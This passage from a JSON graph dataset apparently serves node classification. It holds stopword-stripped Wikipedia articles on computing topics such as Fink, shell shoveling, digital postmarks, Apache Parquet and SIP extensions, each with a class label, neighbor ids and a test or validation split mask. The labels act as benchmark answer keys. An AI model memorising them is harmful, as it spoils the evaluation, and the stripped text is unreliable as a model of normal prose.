      11549,
      7970,
      2339,
      8998,
      1832,
      6827,
      7983,
      3890,
      8757,
      6462,
      4289,
      6088,
      9033,
      1098,
      10957,
      4051,
      9812,
      11221,
      342,
      11605,
      9434,
      9819,
      11103,
      10338,
      740,
      488,
      617,
      8681,
      2027,
      5356,
      10989,
      1148,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 741,
    "label": 2,
    "text": "Fink_(software):fink software fink project effort port package open-source unix programs macos fink uses dpkg apt debian package management system well frontend program codice_1 implemented set perl modules fink features binary distribution quick easy installation using apt well extensive source distribution addition command-line tools handling packages shareware app phynchronicity provides gui fink used install newer versions packages installed macos install packages included macos apple edict fink stores data directory codice_2 default though changed initially compiling fink source code goes filesystem hierarchy standard recommendation use codice_3 prefix reasons given fink faq installers might overwrite fink files codice_3 entirely separate directory makes easier disable binaries libraries fink installs within fink directory fhs-like layout codice_5 codice_6 codice_7 etc used fink project started december 2000 german hacker christoph pfisterer name fink german finch reference name macos core darwin charles darwin study diversity among finches led eventually concept natural selection christoph pfisterer left project november 2001 since several people stepped picked support fink march 2008 project managed 6 administrators 89 developers active community march 2014 fink core team made nine active developers responsible central management project maintain essential packages fink community regularly adds support latest versions macos release latest fink versions starting version 0.39 support os x el capitan",
    "neighbors": [
      6657,
      8068,
      11525,
      3462,
      8582,
      10760,
      2955,
      7435,
      6797,
      7947,
      9487,
      788,
      1813,
      5397,
      8213,
      6680,
      10900,
      10394,
      8476,
      9245,
      5155,
      5670,
      4775,
      7722,
      811,
      6828,
      5677,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      5819,
      10172,
      190,
      9151,
      3393,
      10817,
      708,
      8644,
      9671,
      5578,
      5067,
      3918,
      463,
      4302,
      5070,
      2259,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      8413,
      2401,
      1379,
      7140,
      231,
      5096,
      2281,
      6119,
      8554,
      5612,
      9063,
      9324,
      10096,
      1138,
      1522,
      5492,
      3573,
      2168,
      6393,
      7293,
      9342
    ],
    "mask": "Test"
  },
  {
    "node_id": 742,
    "label": 4,
    "text": "Shell_shoveling:shell shoveling shell shoveling network security refers act redirecting input output shell service remotely accessed computing basic method interfacing operating system shell microsoft windows based systems program called cmd.exe command.com unix unix-like systems may variety programs bash ksh etc program accepts commands typed prompt executes usually real time displaying results referred standard output usually monitor screen shell shoveling process one programs set run perhaps silently without notifying someone observing computer accepting input remote system redirecting output remote system therefore operator shoveled shell able operate computer present console",
    "neighbors": [
      6498,
      7717,
      939,
      6797,
      3856,
      11442,
      5492,
      5397,
      7325
    ],
    "mask": "Test"
  },
  {
    "node_id": 743,
    "label": 4,
    "text": "Alexandra_Elbakyan:alexandra elbakyan alexandra asanovna elbakyan kazakhstani graduate student computer programmer described internet pirate hiding science pirate queen creator site sci-hub nature listed 2016 top ten people mattered science ars technica compared aaron swartz new york times compared edward snowden elbakyan born almaty kazakhstan 6 november 1988 armenian slavic asian descent elbakyan undertook university studies almaty developed skills computer hacking year working computer security moscow gave finances proceed freiburg 2010 work brain–computer interface project developed interest transhumanism led summer internship georgia institute technology united states studied neuroscience consciousness 2009 obtained bachelor science degree computer science kazakh national technical university specializing information security began sci-hub return kazakhstan 2011 characterised science correspondent john bohannon awe-inspiring act altruism massive criminal enterprise depending ask following lawsuit brought us publisher elsevier elbakyan presently hiding due risk extradition elsevier granted 15 million injunction according 2016 interview neuroscience research hold enrolled history science master ’ program small private university undisclosed location thesis focuses scientific communication december 2016 nature publishing group named alexandra elbakyan one 10 people mattered science 2016 elbakyan sci-hub involved lawsuit 2017 time american chemical society acs sued site copyright infringement contributory copyright infringement trademark counterfeiting trademark infringement conversion later year court ruled favor acs fining sci-hub 4,800,000 damages elbakyan stated inspired communist ideals although consider strict marxist stated supports strong state stand western world want scientists russia native kazakhstan share fates scientists iraq libya syria 'helped usa become democratic particular elbakyan strongly critical former dynasty foundation associated figures believing foundation politicized tied russia liberal opposition fit legal definition foreign agent dynasty founder opinion financed researchers whose political views agreed elbakyan states began investigate foundation activities published findings online became target cyberharassment campaign dynasty supporters 2017 species parasitoid wasps discovered russian mexican entomologists named elbakyan idiogramma elbakyanae elbakyan offended writing analyse situation scientific publications real parasites scientific publishers sci-hub contrary fights equal access scientific information following event context long-running tense relations liberal pro-western wing russian scientific community blocked access sci-hub users russian federation sci-hub access later restored russia elbakyan said interview many fans contacted convinced opinion so-called 'science popularizers attacked internet considered opinion scientific community russian entomologist responsible naming wasp stated supports sci-hub event naming insult particular parasitoids closer predators parasites elbakyan strong supporter open access movement claims sci-hub mission falls perfectly line movement argues websites like sci-hub part goal open access proponents striving towards elbakyan believes via open access movement citizens become informed 2018 elbakyan asked supporters sci-hub join local pirate party order fight copyright laws changed",
    "neighbors": [
      3495,
      3817,
      11659,
      2864,
      4752,
      5973,
      3223,
      4956,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 744,
    "label": 4,
    "text": "Digital_Postmarks:digital postmarks digital postmark dpm technology applies trusted time stamps issued postal operator electronic document validates electronic signatures stores archives non-repudiation data needed support potential court challenge guarantees certainty date time postmarking global standard renamed electronic postal certification mark epcm 2007 shortly new iteration technology developed microsoft poste italiane key addition traditional postmarking technology integrity electronically postmarked item meaning kind falsification tampering easily definitely detected additionally content confidentiality guaranteed since document certification carried without access reading postal operator epcm eventually available upu international postal operators 191 member countries willing compliant standard thus granting interoperability certified communications postal operators united states us postal service operates non-global standard called electronic postmark although soon expected provide services utilizing epcm united states end 2010 authentidate authorized usps epm provider however contract allowed expire dpm fundamentally non-repudiation service supporting designed protect sanctity mail digital form working current infrastructure easy implement providing functionality even client-side software provides automated functionality client software digital postmark used variety business applications key dates development digital postmark recognizing great potential digital postmark numerous postal administrations worldwide begun deploying dpm-based solutions five postal services – canada france italy portugal united states – developed digital postmark use today major software developers also working incorporate global standard popular applications used millions people worldwide universal postal union upu identified trust services greatest opportunity global postal growth specifically identified digital postmark important trust service providing excellent defense online fraud abuse united states postal service usps electronic postmark epm © proprietary variation digital postmark issued usps introduced 1996 u.s postal service service offering provides proof integrity authentication electronic transactions applied email epostmarks inc. see epostmarks homepage usps epm web-based service third-party verify authenticity electronic content electronic proof postmarked postal service provides evidence support non-repudiation electronic transactions epm designed deter detect fraudulent tampering altering electronic data usps wrote key features electronic postmark usps listed laws relevant epm follows digital postmark dpm also network security mechanism developed penn state researchers ihab hamadeh george kesidis identify region packet set packets comes developed way combat spam denial-of-service virus attacks isolating source attacks still allowing good messages pass digital postmark works perimeter router marks packet border region-identifying data also called border router packet marking uses obsolete unused portion packet place regional mark-up room exist one portion packet region information broken hashed subsequently retrievable way",
    "neighbors": [
      2848,
      7075,
      11684,
      4490,
      939,
      3629,
      7739,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 745,
    "label": 4,
    "text": "Differentiated_security:differentiated security differentiated security form computer security deploys range different security policies mechanisms according identity context user transaction makes much difficult scale replicate attacks since cluster/individual different security profile common weaknesses one way achieving subdividing population small differentiated clusters extreme individual belongs different class",
    "neighbors": [
      11262,
      8259,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 746,
    "label": 6,
    "text": "Linear_Data_Set:linear data set linear dataset lds type data set organization used vsam computer data storage system data set allows physical addressing allows used systems operating systems benefit systems os access multiple disk spindles view single storage implementation limitations though make particularly useful higher level abstraction levels",
    "neighbors": [
      2104,
      1801,
      2077
    ],
    "mask": "Test"
  },
  {
    "node_id": 747,
    "label": 7,
    "text": "Apache_Parquet:apache parquet apache parquet free open-source column-oriented data storage format apache hadoop ecosystem similar columnar-storage file formats available hadoop namely rcfile orc compatible data processing frameworks hadoop environment provides efficient data compression encoding schemes enhanced performance handle complex data bulk open-source project build apache parquet began joint effort twitter cloudera parquet designed improvement upon trevni columnar storage format created hadoop creator doug cutting first version—apache parquet 1.0—was released july 2013 since april 27 2015 apache parquet top-level apache software foundation asf -sponsored project apache parquet implemented using record-shredding assembly algorithm accommodates complex data structures used store data values column physically stored contiguous memory locations columnar storage provides following benefits moreover apache parquet implemented using apache thrift framework increases flexibility work number programming languages like c++ java python php etc august 2015 parquet supports big-data-processing frameworks including apache hive apache drill apache impala apache crunch apache pig cascading apache spark parquet compression performed column column enables different encoding schemes used text integer data strategy also keeps door open newer better encoding schemes implemented invented parquet automatic dictionary encoding enabled dynamically data small number unique values 10^5 enables significant compression boosts processing speed storage integers usually done dedicated 32 64 bits per integer small integers packing multiple integers space makes storage efficient optimize storage multiple occurrences value single value stored along number occurrences parquet implements hybrid bit packing rle encoding switches based produces best compression results strategy works well certain types integer data combines well dictionary encoding apache parquet comparable rcfile optimized row columnar orc file formats -- -all three fall category columnar data storage within hadoop ecosystem better compression encoding improved read performance cost slower writes addition features apache parquet supports limited schema evolution i.e. schema modified according changes data also provides ability add new columns merge schemas n't conflict",
    "neighbors": [
      9344,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      7159,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      8644,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      7767,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8554,
      8810,
      5612,
      2163,
      5238,
      6774,
      1913,
      1018
    ],
    "mask": "None"
  },
  {
    "node_id": 748,
    "label": 3,
    "text": "Koronis_Rift:koronis rift koronis rift 1985 computer game lucasfilm games produced designed noah falstein originally developed atari 8-bit family commodore 64 koronis rift ported amstrad cpc apple ii msx tandy color computer 3 zx spectrum atari c64 version shipped flippy disk one version game side cassette version also released commodore 64 atari version required computers gtia chip installed order display properly koronis rift one two games lucasfilm games second wave december 1985 eidolon enhanced fractal technology developed rescue fractalus koronis rift atari 8-bit family additional colors commodore 64 allowed programmers gradually fade background rather suddenly popping rescue early example depth cueing computer game player controls surface rover vehicle enter several rifts alien planet effectively fractal mazes lost civilisation known ancients left strange machinery so-called hulks within rifts guarded armed flying saucers different design color depending respective color shields gunshots rover saucers varying effectiveness part game figuring shield weapon modules work best means drone robot rover retrieve modules various functions immediately obvious nearby hulks deployed attacking guardian saucers destroyed modules installed rover analyzed aboard player space ship sold rover carry six different modules time activated de-activated player sees fit large variety modules available different weapon shield modules varying power levels color codes modules increase rover power output mapper activating extra screen rover even one module turns retrieval probe bomb destroying hulks probe sent investigate instead retrieving modules conversely different types hulks exist including one simply swallows probe without yielding module requiring player purchase new probe possibly sell useful modules raise required funds goal game find destroy saucer control base hulk located 20th rift end player must explore rifts find hulks retrieve analyze modules understand color-coding weapons shields overcome increasingly aggressive dangerous saucers game solved several ways quickest acquire bomb module send probe saucer base bomb module activated info rated koronis rift four stars five stating best epyx four lucasfilm games computer gaming world stated kr game also puzzle ... arcade skill alone n't enough reviewer enjoy game difficult spent much time savescumming praised graphics sound zzap 64 thought game improvement predecessor rescue fractalus superior graphics gameplay given overall rating 96",
    "neighbors": [
      707,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 749,
    "label": 9,
    "text": "RoboDK:robodk robodk offline programming simulation software industrial robots simulation software used many manufacturing projects including milling welding pick place packaging labelling palletizing painting robot calibration robodk library 300 robots 30 different manufacturers including abb fanuc kuka motoman universal robots user interface enables easy simulation n't require previous programming knowledge different types files imported including step iges files robodk post processors allow programs exported actual robot including abb rapid mod/prg fanuc ls ls/tp kuka krc/iiwa src/java motoman inform jbi universal robots urscript",
    "neighbors": [
      4792,
      7983,
      6797,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 750,
    "label": 7,
    "text": "RushTera:rushtera rushtera software service provides accelerated upload/download storage sharing management large media files rushtera first demonstrated april 2012 nab show product marketed new york company attend llc founded 2008 2012 rushtera deployed cloudsigma since redeployed private infrastructure provided unitas global attend content ingest network uses geographically distributed virtual machines eliminate latency provide fast uploads downloads huge files rushtera became generally available november 2012 since rushtera used focus features post production several major motion pictures including academy award winner dallas buyers club well kill messenger world end black sea admission promax/bda used rushtera submissions platform hot spots showcase 2013 2014 company ceo chuck stormon interviewed january 2013 attend llc rushtera selected alternate finalist 13th 6,932 applicants 43north largest business idea competition world",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 751,
    "label": 5,
    "text": "Multiprotocol_Encapsulation:multiprotocol encapsulation multiprotocol encapsulation mpe short data link layer protocol defined dvb published part etsi en 301 192 provides means carry packet oriented protocols like instance ip top mpeg transport stream ts another encapsulation method unidirectional lightweight encapsulation ule developed standardized within ietf rfc 4326 mpe uses mpeg-2 private table sections carry user datagrams section header used convey mac addresses 1 6 bytes length may used format mpeg-2 dsm-cc sections happens compatible dvb mpe complete ip service offering mpeg-2 ts established organizing mpe streams one ip platforms carried broadcast network means ip/mac notification table mechanism also defined etsi en 301 192 major european satellite operators ses eutelsat offering commercial ip services using mpe astra2connect businesses consumers",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      3383,
      7865,
      10171,
      3133,
      3006,
      702,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      7411,
      3322,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 752,
    "label": 4,
    "text": "IDrive_Inc.:idrive inc. idrive inc. technology company specializes data backup applications flagship product idrive online backup service available windows mac linux ios iphone ipad android users pro softnet corporation founded 1995 based calabasas california within los angeles county pro softnet corporation initial product called ibackup acquired idrive.com domain name defunct company i-drive around mid-2003 idrive products mentioned lifehacker macworld pc world cnet tech crunch notebook review pc magazine engadget idrive based bangalore india pro softnet corporation plagued patent infringement lawsuits spoken publicly drain company resources idrive automated backup application runs windows mac ios android installed users select folders files backed user-specified times idrive offers incremental compressed backups users upload modified portions backup file files may also updated real time continuous backup option users ability limit bandwidth usage backup process previous 10 versions file automatically retained idrive automatically delete backup data even backup files deleted user computer users share files email social media sites including facebook twitter via mobile phone application android iphone windows phone idrive allows user back data compatible devices single account idrive application runs natively windows osx well several models nas devices made synology qnap netgear idrive provides multiple data retrieval options backup files accessed remotely internet browser idrive client software user wants access backup files idrive ship backup files 3 tb hard drive files idrive stored using 256-bit aes encryption allowing optional user-defined key must shared idrive idrive claims permanently stored servers idrive also provides activity reports backup status reports shared file reports idrivesync allows user synchronize files across different devices idrive portable usb hard drive designed local backup hard drive 3 terabyte storage space runs 5,400 rpm idrive lite free application ios blackberry android devices allows users back contacts list online users also restore backup contacts different devices even devices different operating systems 2012 idrive released idrive evs publicly available software development kit api kit includes built-in encryption command-line api allows users create applications use idrive cloud storage services idriveconnect allowing users access google docs sitting regular folder computer",
    "neighbors": [
      2208,
      9732,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 753,
    "label": 5,
    "text": "Firefly_Media_Server:firefly media server firefly media server formerly mt-daapd open-source audio media server daemon roku soundbridge itunes serves media files using roku server protocol rsp digital audio access protocol daap features include firefly media server formerly known mt-daapd renamed adopted new features support rsp support microsoft windows mac os x. firefly media server active development although attempts resurrect abortive effort continue project firefly2 media server without developers coming forward however old forums links many forked versions available new website since july 2009 development continues linux/freebsd fork named forked-daapd latest version forked-daapd v25.0",
    "neighbors": [
      9732,
      11037,
      5291,
      5612,
      6797,
      9358,
      11063,
      5492,
      823,
      4219,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 754,
    "label": 7,
    "text": "Cloudlet:cloudlet cloudlet mobility-enhanced small-scale cloud datacenter located edge internet main purpose cloudlet supporting resource-intensive interactive mobile applications providing powerful computing resources mobile devices lower latency new architectural element extends today ’ cloud computing infrastructure represents middle tier 3-tier hierarchy mobile device cloudlet cloud cloudlet viewed data center box whose goal bring cloud closer cloudlet term first coined m. satyanarayanan victor bahl ramón cáceres nigel davies prototype implementation developed carnegie mellon university research project concept cloudlet also known follow cloud mobile micro-cloud many mobile services split application front-end client program back-end server program following traditional client-server model front-end mobile application offloads functionality back-end servers various reasons speeding processing advent cloud computing back-end server typically hosted cloud datacenter though use cloud datacenter offers various benefits scalability elasticity consolidation centralization lead large separation mobile device associated datacenter end-to-end communication involves many network hops results high latencies low bandwidth reasons latency emerging mobile applications require cloud offload infrastructure close mobile device achieve low response time ideal case one wireless hop away example offload infrastructure could located cellular base station could lan-connected set wi-fi base stations individual elements offload infrastructure referred cloudlets cloudlets aim support mobile applications resource-intensive interactive augmented reality applications use head-tracked systems require end-to-end latencies less 16 ms cloud games remote rendering also require low latencies high bandwidth wearable cognitive assistance system combines device like google glass cloud-based processing guide user complex task futuristic genre applications characterized “ astonishingly transformative ” report 2013 nsf workshop future directions wireless networking applications use cloud resources critical path real-time user interaction consequently tolerate end-to-end operation latencies tens milliseconds apple siri google perform compute-intensive speech recognition cloud examples emerging space significant overlap requirements cloud cloudlet levels need strong isolation untrusted user-level computations b mechanisms authentication access control metering c dynamic resource allocation user-level computations ability support wide range user-level computations minimal restrictions process structure programming languages operating systems cloud datacenter requirements met today using virtual machine vm abstraction reasons used cloud computing today vms used abstraction cloudlets meanwhile important differentiators cloud cloudlet different cloud data centers optimized launching existing vm images storage tier cloudlets need much agile provisioning association mobile devices highly dynamic considerable churn due user mobility user far away may unexpectedly show cloudlet e.g. got international flight try use application personalized language translator user provisioning delay able use application impacts usability mobile device user moves away cloudlet currently using interactive response degrade logical network distance increases address effect user mobility offloaded services first cloudlet need transferred second cloudlet maintaining end-to-end network quality resembles live migration cloud computing differs considerably sense vm handoff happens wide area network wan since cloudlet model requires reconfiguration additional deployment hardware/software important provide systematic way incentivise deployment however face classic bootstrapping problem cloudlets need practical applications incentivize cloudlet deployment however developers heavily rely cloudlet infrastructure widely deployed break deadlock bootstrap cloudlet deployment researchers carnegie mellon university proposed openstack++ extends openstack leverage open ecosystem openstack++ provides set cloudlet-specific api openstack extensions 2015 cloudlet based applications commercially available 2017 national institute standards technology published draft standards fog computing cloudlets defined nodes fog architecture",
    "neighbors": [
      4194,
      1602,
      4964,
      2222,
      754,
      154
    ],
    "mask": "None"
  },
  {
    "node_id": 755,
    "label": 5,
    "text": "SIP_extensions_for_the_IP_Multimedia_Subsystem:sip extensions ip multimedia subsystem session initiation protocol sip signaling protocol selected 3rd generation partnership project 3gpp create control multimedia sessions two participants ip multimedia subsystem ims therefore key element ims framework sip developed internet engineering task force ietf standard controlling multimedia communication sessions internet protocol ip networks working application layer internet protocol suite several sip extensions added basic protocol specification order extend functionality extensions based request comments rfc protocol recommendations ietf 3gpp collaboration groups telecommunications associations aimed developing maintaining ims stated series requirements sip successfully used ims could addressed using existing capabilities extensions sip cases 3gpp collaborate ietf standardize new sip extensions meet new requirements case ietf evolves sip generic basis use extensions restricted ims framework 3gpp stated several general requirements stated operation ims include efficient use radio interface minimizing exchange signaling messages mobile terminal network minimum session setup time performing tasks prior session establishment instead session establishment minimum support required terminal support roaming non-roaming scenarios terminal mobility management supported access network sip support ipv6 addressing requirements involve protocol extensions sip header fields exchange user server information sip methods support new network functionality requirement registration re-registration de-registration event notifications instant messaging call control primitives additional capabilities call transference specific requirements finally also necessary protocols network services dhcp dns adapted work sip instance outbound proxy p-cscf location sip uniform resource identifier uri ip address resolution respectively mechanism sip extension negotiation user agents ua servers consisting three header fields supported require unsupported uas servers i.e user terminals call session control function cscf ims may use specify extensions understand client initiates sip dialog server states extensions requires used also extensions understood supported server send response list extensions requires extensions listed client message response server error response likewise server support client required extensions send error response list unsupported extensions kind extensions called option tags sip also extended new methods case user agents servers use allow header state methods support require use particular method particular dialog must use option tag associated method two extensions allow users specify preferences service ims provides caller preferences extension calling party able indicate kind user agent want reach e.g whether fixed mobile voicemail human personal business services capable provide methods supports search three header fields accept-contact describe desired destination user agents reject-contact state user agents avoid request-disposition specify request handled servers network i.e whether redirect search user sequentially parallel using user agent capabilities extension user agents terminals describe register others search according caller preferences extension headers purpose list capabilities contact header field register message aim event notification obtain status given resource e.g user one voicemail service receive updates status changes event notification necessary ims framework inform presence user i.e online offline others may waiting contact notify user p-cscf registration state know reachable public identities registered moreover event notification used provide additional services voicemail i.e notify new voice messages inbox end specific event notification extension defines framework event notification sip two new methods subscribe notify new header fields response codes two roles subscriber notifier entity interested state information resource subscriber sends subscribe message uniform resource identifier uri resource request initial line type event event header entity charge keeping track state resource notifier receives subscribe request sends back notify message subscription-state header well information status resource message body whenever resource state changes notifier sends new notify message subscriber kind event subscriber subscribe defined new event package event package describes new value subscribe event header well mime type carry event state information notify message also allow-events header indicate event notification capabilities 202 accepted 489 bad event response codes indicate subscription request preliminary accepted turned notifier understand kind event requested order make efficient use signaling messages also possible establish limited notification rate real-time notifications mechanism called event throttling moreover also mechanism conditional event notification allows notifier decide whether send complete notify message depending something new notify since last subscription event notification framework defines user agent subscribe events state resource specify state published sip extension event state publication defined allow user agents publish state event entity notifier thais responsible composing event state distributing subscribers state publication framework defines new method publish used request publication state resource specified request-uri reference event stated event header information carried message body functionality sending instant messages provide service similar text messaging defined instant messaging extension messages unrelated i.e originate sip dialog sent sip signaling network sharing resources control messages functionality supported new message method used send instant message resource stated request-uri content carried message body content defined mime type text/plain common one order instant messaging session related messages message session relay protocol msrp used refer method extension defines mechanism request user agent contact resource identified uri refer-to header field request message typical use mechanism call transfer call participant sends refer message tells recipient contact user agent identified uri corresponding header field refer message also implies event subscription result operation sender know whether recipient could contact third person however mechanism restricted call transfer since refer-to header field kind uri instance http uri require recipient visit web page basic sip specification requests final responses i.e 2xx response codes transmitted reliably retransmitted sender acknowledge message arrives i.e corresponding response code request ack request corresponding 2xx response code mechanism necessary since sip run reliable transport protocols tcp assure message delivered also unreliable ones udp offer delivery guarantees even possible kinds protocols present different parts transport network however scenario ims framework necessary extend reliability provisional responses invite requests session establishment start call reliability provisional responses extension provides mechanism confirm provisional responses 180 ringing response code lets caller know callee alerted successfully received extension defines new method prack request message used tell sender provisional response message received message includes rack header field sequence number matches rseq header field provisional response acknowledged also contains cseq number identifies corresponding invite request indicate user agent requests supports reliable provisional responses 100rel option tag used aim update method extension allow user agents provide updated session description information within dialog final response initial invite request generated used negotiate allocate call resources called party alerted ims framework required callee alerted chances session failure minimum important source failure inability reserve network resources support session resources allocated phone rings however ims reserve resources network needs know callee ip address port session parameters therefore necessary initial offer/answer exchange establish session started invite request basic sip exchange eventually causes callee alerted solve problem concept preconditions introduced concept caller states set constraints session i.e codecs qos requirements offer callee responds offer without establishing session alerting user establishment occur caller callee agree preconditions met preconditions sip extension affects sip new option tag precondition defined offer/answer exchanges session description protocol sdp format used describe streaming media initialization parameters carried body sip messages new sdp attributes meant describe current status resource reservation desired status reservation proceed session establishment confirmation status indicate reservation status confirmed ims initial session parameter negotiation done using provisional responses session description updating extensions along sdp body messages first offer described means sdp carried invite request deal caller supported codecs request answered provisional reliable response code 183 session progress carry sdp list supported codecs caller callee corresponding prack provisional answer used select codec initiate qos negotiation qos negotiation supported prack request starts resource reservation calling party network answered 2xx response code response sent called party selected codec starts resource reservation side subsequent update requests sent inform reservation progress answered 2xx response codes typical offer/answer exchange one update sent calling party reservation completed called party respond eventually finish allocating resources resources call place caller alerted ims framework fundamental handle user identities authentication authorization accounting purposes ims meant provide multimedia services ip networks also needs mechanism charge users functionality supported new special header fields private header extensions sip also known p-headers special header fields whose applicability limited private networks certain topology characteristics lower layers protocols designed specifically meet 3gpp requirements general solution available header fields used variety purposes including charging information networks call traverses private headers defined user database accessing private extensions asserted identity within trusted networks designed enable network trusted sip servers assert identity authenticated users within administrative domain previously agreed policies generation transport usage identification information extensions also allow users request privacy identities spread outside trust domain indicate must insert privacy token id privacy header field main functionality supported p-asserted-identity extension header proxy server receives request untrusted entity authenticates user i.e verifies user says inserts header identity authenticated forwards request usual way proxy servers receive sip request within trust domain i.e network trusted entities previously agreed security policies safely rely identity information carried p-asserted-identity header without necessity re-authenticating user p-preferred-identity extension header also defined user several public identities able tell proxy public identity included p-asserted-identity header user authenticated finally privacy requested proxies must withhold asserted identity information outside trusted domain removing p-asserted-identity headers forwarding user requests untrusted identities outside trust domain exist analogous extension headers handling identification services users instead users case uniform resource names used identify service e.g voice call instant messaging session iptv streaming access security ims consists first authenticating authorizing user done s-cscf establishing secure connections p-cscf user several mechanisms achieve security mechanisms agreement extension sip introduced provide secure mechanism negotiating security algorithms parameters used p-cscf terminal extension uses three new header fields support negotiation process necessity ims reserving resources provide quality service qos leads another security issue admission control protection denial-of-service attacks obtain transmission resources user agent must present authorization token network i.e policy enforcement point pep token obtained p-cscf may charge qos policy control interface policy control entity network i.e policy decision function pdf originally provides authorization token private extensions media authorization link session signaling qos mechanisms applied media network defining mechanisms obtaining authorization tokens p-media-authorization header field carry tokens p-cscf user agent extension applicable within administrative domains trust relationships particularly designed specialized sip networks like ims general internet source routing mechanism allows sender message specify partially completely route message traverses sip route header field filled sender supports functionality listing set proxies message visit ims context certain network entities i.e certain cscfs must traversed requests user listed route header field allow sender discover entities populate route header field mainly two extension header fields path service-route extension header field registering non-adjacent contacts provides path header field accumulates transmits sip uris proxies situated user agent registrar register message traverses way registrar able discover record sequence proxies must transited get back user agent ims every user agent served p-cscf discovered using dynamic host configuration protocol equivalent mechanism user enters ims network requests responses user agent must traverse proxy user registers home registrar s-cscf p-cscf adds sip uri path header field register message s-cscf receives stores information associated contact information user way s-cscf forward every request addressed user corresponding p-cscf listing uri route header field extension service route discovery registration consists service-route header field used registrar 2xx response register request inform registering user entity must forward every request originated ims registrar home network s-cscf also required requests handled entity include sip uri service-route header field user include sip uri route header field requests forwarded home s-cscf ims possible user multiple terminals e.g mobile phone computer application instances e.g video telephony instant messaging voice mail identified public identity i.e sip uri therefore mechanism needed order route requests desired device application globally routable user agent uri gru uri identifies specific user agent instance i.e terminal application instance globally i.e valid route messages user agent user agent internet uris constructed adding gr parameter sip uri either public sip uri value identifies user agent instance specially created uri reveal relationship gruu user identity privacy purposes commonly obtained registration process registering user agent sends uniform resource name urn uniquely identifies sip instance registrar i.e s-cscf builds gruu associates registered identity sip instance sends back user agent response s-cscf receives request gruu able route request registered sip instance efficient use network resources may include radio interface low-bandwidth access essential ims order provide user acceptable experience terms latency achieve goal sip messages compressed using mechanism known sigcomp signaling compression compression algorithms perform operation substituting repeated words message position dictionary words appear first approach dictionary may built message compressor sent decompressor along message however many words repeated different messages extended operations sigcomp define way use shared dictionary among subsequent messages moreover order speed process building dictionary along subsequent messages provide high compression ratios since first invite message sip provides static sip/sdp dictionary already built common sip sdp terms mechanism indicate sip message desired compressed mechanism defines comp=sigcomp parameter sip uris signals sip entity identified uri supports sigcomp willing receive compressed messages used request-uris indicates request compressed via header fields signals subsequent response compressed order obtain even shorter sip messages make efficient use resources content indirection extension makes possible replace mime body part message external reference typically http uri way recipient message decide whether follow reference fetch resource depending bandwidth available network address translation nat makes impossible terminal reached outside private network since uses private address mapped public one packets originated terminal cross nat therefore nat traversal mechanisms needed signaling plane media plane internet engineering task force rfc 6314 summarizes unifies different methods achieve symmetric response routing client-initiated connections sip signaling use stun turn ice combines previous ones media streams internet engineering task force rfc 6157 describes necessary mechanisms guarantee sip works successfully internet protocol versions transition ipv6 sip signaling messages transmitted heterogeneous ipv4/ipv6 networks long proxy servers dns entries properly configured relay messages across networks according recommendations user agents need implement extensions directly exchange media streams extensions related session description protocol offer/answer initial exchange used gather ipv4 ipv6 addresses ends establish direct communication apart explained extensions sip make possible ims work successfully also necessary ims framework interworks exchanges services existing network infrastructures mainly public switched telephone network pstn several standards address requirements following two services interworking pstn internet i.e ims network also pstn-sip gateways support calls one end network moreover sip info method extension designed carry user information terminals without affecting signaling dialog used transport dual-tone multi-frequency signaling provide telephone keypad function users",
    "neighbors": [
      2818,
      6403,
      9745,
      11413,
      2456,
      1437,
      3742,
      10270,
      10271,
      3105,
      10924,
      1709,
      7214,
      2996,
      5433,
      2558,
      7368,
      5071,
      3792,
      2901,
      5469,
      5470,
      5472,
      8674,
      2409,
      7802,
      3198,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 756,
    "label": 3,
    "text": "Federation_(information_technology):federation information technology federation group computing network providers agreeing upon standards operation collective fashion term may used describing inter-operation two distinct formally disconnected telecommunications networks may different internal structures term may also used groups attempt delegate collective authority development prevent fragmentation telecommunication interconnection internal modus operandi different systems irrelevant existence federation joining two distinct networks collective authority networking systems federated means users able send messages one network client operate networks interacts independently example 2009 google allowed gmail users log aol instant messenger aim accounts gmail one could send messages gtalk accounts xmpp google/gtalk federated with—xmpp lingo federation s2s facebook msn live implementations support aim screen names vice versa may 2011 aim gmail federated allowing users network add communicate",
    "neighbors": [
      2377,
      362,
      2346,
      4746,
      7210,
      6286,
      8735,
      9967,
      531,
      8979,
      3350,
      3959,
      8446,
      574,
      8159
    ],
    "mask": "None"
  },
  {
    "node_id": 757,
    "label": 3,
